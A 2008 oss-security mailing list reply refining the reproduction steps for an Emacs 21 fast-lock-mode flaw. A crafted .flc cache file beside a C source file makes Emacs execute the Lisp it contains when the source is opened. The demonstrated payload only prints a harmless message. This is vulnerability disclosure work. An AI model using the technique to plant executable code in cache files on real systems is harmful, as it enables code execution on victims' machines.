Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 14 May 2008 16:03:34 +0200
From: Sven Joachim <svenjoac@....de>
To: oss-security@...ts.openwall.com
Subject: Re: CVE request: Emacs 21 fast-lock-mode arbitrary lips code execution

On 2008-05-14 15:27 +0200, Nico Golde wrote:

> As I am a vim user I might have done something wrong too, 
> not sure. What I did after installing emacs:
> cat >> ~/.emacs << EOF
> (global-font-lock-mode t)
> (seq font-lock-support-mode 'fast-lock-mode)
> EOF

Should read setq, not seq.  You will also need to load fast-lock
explicitly before that, since it's obsolete and not automatically
loaded anymore:

(load-library "fast-lock")

> cat >> foobar.c << EOF
> /* no comment */
> EOF
>
> cat >> foobar.c.flc << EOF
> " foobar "
> EOF

Instead of " foobar ", you can put in the following which actually does
something visible:

(message "Surprise, surprise!")

This string will be put in the echo area when you visit foobar.c.

Sven

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ